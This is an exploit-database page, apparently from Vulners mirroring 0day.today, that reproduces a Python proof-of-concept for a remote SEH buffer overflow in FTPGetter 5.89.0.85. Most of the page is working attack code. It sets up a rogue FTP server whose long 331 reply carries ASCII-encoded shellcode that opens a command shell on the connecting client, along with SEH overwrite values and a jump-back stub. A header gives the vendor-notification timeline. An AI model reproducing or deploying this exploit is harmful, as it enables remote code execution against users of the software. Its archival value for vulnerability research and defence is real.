Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

FTPGetter 5.89.0.85 - Buffer Overflow (SEH) Exploit

🗓️ 16 Jul 2017 00:00:00Reported by Paul PurcellType 
zdt
 zdt🔗 0day.today👁 26 Views

FTPGetter 5.89.0.85 Remote SEH Buffer Overflow in Log Viewe

Code
#!/usr/bin/python
 
# Exploit Title: FTPGetter 5.89.0.85 Remote SEH Buffer Overflow
# Date: 07/14/2017
# Exploit Author: Paul Purcell
# Vendor Homepage: https://www.ftpgetter.com/
# Vulnerable Version Download: Available for 30 days here: (https://ufile.io/2celn) I can upload again upon request
# Version: FTPGetter 5.89.0.85 (also works on earlier versions)
# Tested on: Windows 10 Pro 1703 x64
# Youtube Demonstration of Exploit: https://www.youtube.com/watch?v=AuAiQwGP-ww
# Category: Remote Code Execution
#
# Timeline: 05/25/16 Bug found
#           05/31/16 Vender notified - no response
#           07/15/16 Vender notified - no response
#           -------- Vender notified multiple times over a year, no response.
#           07/14/17 Exploit Published
#
# Summary:  There is a buffer overflow in the log viewer/parser of FTPGetter.  When a malicious ftp server returns a long
#           331 response, the overflow overwrites SEH produced is exploitable.  There are many bad characters, so I had to ascii encode everything.
#           My PoC runs code to launch a command shell.  Also note the time of day is displayed in the log viewer, which will
#           change the length of the buffer needed.  Just adjust your sled accordingly.  
  
from socket import *
 
#ascii encoded launch cmd.exe
buf =  ""
buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x4b\x4c\x6b\x58\x4f\x72\x67\x70\x43\x30\x55\x50\x33"
buf += "\x50\x4f\x79\x4a\x45\x44\x71\x4f\x30\x71\x74\x6c\x4b"
buf += "\x70\x50\x34\x70\x4e\x6b\x61\x42\x54\x4c\x4c\x4b\x42"
buf += "\x72\x47\x64\x4e\x6b\x64\x32\x44\x68\x36\x6f\x4c\x77"
buf += "\x42\x6a\x46\x46\x30\x31\x4b\x4f\x4c\x6c\x57\x4c\x31"
buf += "\x71\x63\x4c\x44\x42\x64\x6c\x35\x70\x7a\x61\x38\x4f"
buf += "\x56\x6d\x55\x51\x6f\x37\x38\x62\x4c\x32\x61\x42\x52"
buf += "\x77\x4c\x4b\x51\x42\x32\x30\x6e\x6b\x50\x4a\x77\x4c"
buf += "\x4e\x6b\x42\x6c\x34\x51\x44\x38\x68\x63\x32\x68\x66"
buf += "\x61\x58\x51\x62\x71\x6c\x4b\x76\x39\x35\x70\x35\x51"
buf += "\x49\x43\x4e\x6b\x37\x39\x67\x68\x68\x63\x55\x6a\x72"
buf += "\x69\x4c\x4b\x64\x74\x4e\x6b\x65\x51\x5a\x76\x35\x61"
buf += "\x69\x6f\x4c\x6c\x6b\x71\x78\x4f\x54\x4d\x57\x71\x39"
buf += "\x57\x46\x58\x79\x70\x51\x65\x4c\x36\x67\x73\x51\x6d"
buf += "\x38\x78\x67\x4b\x73\x4d\x64\x64\x32\x55\x39\x74\x56"
buf += "\x38\x4c\x4b\x62\x78\x54\x64\x37\x71\x79\x43\x75\x36"
buf += "\x4e\x6b\x46\x6c\x42\x6b\x4e\x6b\x56\x38\x47\x6c\x46"
buf += "\x61\x5a\x73\x6c\x4b\x45\x54\x4c\x4b\x33\x31\x48\x50"
buf += "\x4c\x49\x73\x74\x44\x64\x44\x64\x33\x6b\x53\x6b\x50"
buf += "\x61\x73\x69\x63\x6a\x62\x71\x59\x6f\x6b\x50\x53\x6f"
buf += "\x51\x4f\x32\x7a\x4e\x6b\x72\x32\x7a\x4b\x4e\x6d\x31"
buf += "\x4d\x52\x4a\x35\x51\x4c\x4d\x4c\x45\x38\x32\x67\x70"
buf += "\x63\x30\x53\x30\x66\x30\x75\x38\x36\x51\x6e\x6b\x52"
buf += "\x4f\x4f\x77\x39\x6f\x4b\x65\x4d\x6b\x6a\x50\x4f\x45"
buf += "\x4f\x52\x30\x56\x42\x48\x6e\x46\x6f\x65\x6f\x4d\x6d"
buf += "\x4d\x49\x6f\x7a\x75\x45\x6c\x73\x36\x51\x6c\x37\x7a"
buf += "\x4b\x30\x39\x6b\x39\x70\x30\x75\x76\x65\x6d\x6b\x72"
buf += "\x67\x32\x33\x52\x52\x62\x4f\x51\x7a\x75\x50\x76\x33"
buf += "\x79\x6f\x4b\x65\x55\x33\x62\x4d\x72\x44\x34\x6e\x53"
buf += "\x55\x43\x48\x61\x75\x57\x70\x41\x41"
 
#All the normal ways to jump back to code I control code were bad characters, so again had to ascii encode
jmpback =  ""
jmpback += "\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
jmpback += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
jmpback += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
jmpback += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
jmpback += "\x4e\x6d\x4d\x6e\x46\x70\x49\x6e\x6b\x4f\x4b\x4f\x49"
jmpback += "\x6f\x6a\x47\x41\x41"
 
host = "0.0.0.0"
port = 21
 
sled="NjoyUrShell!"
fill="\x41"*(480-len(buf))
nseh="\x74\x06\x90\x90"
seh="\xad\x11\x4d\x00"
prepesi="\x58\x58\x58\x8d\x70\x10\x90\x90"
jnk="B"*400
sploit=(sled+buf+fill+nseh+seh+prepesi+jmpback+jnk)
sock = socket(AF_INET, SOCK_STREAM)
sock.bind((host, 21))
sock.listen(1)
 
 
print "Anti-FtpGetter FTP Server Started!"
print "Ready to pwn on port %d..." % port
  
connect, hostip = sock.accept()
print "Connection accepted from %s" % hostip[0]
connect.send("220 Welcome to pwnServ, Serving sploit in 3..2..1..\r\n")
connect.recv(64)  # Receive USER
print "Sending EViL 331 response"
connect.send("331 "+sploit+"\r\n")
print "Here, have a handy dandy command shell!"
connect.close()
sock.close()

#  0day.today [2018-04-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Jul 2017 00:00Current
7.5High risk
Vulners AI Score7.5
exploitremote code executionbuffer overflowftpgettervulnerabilitysehwindows 10poccommand shellasciivendor notificationyoutube demonstrationbad characterscode control
26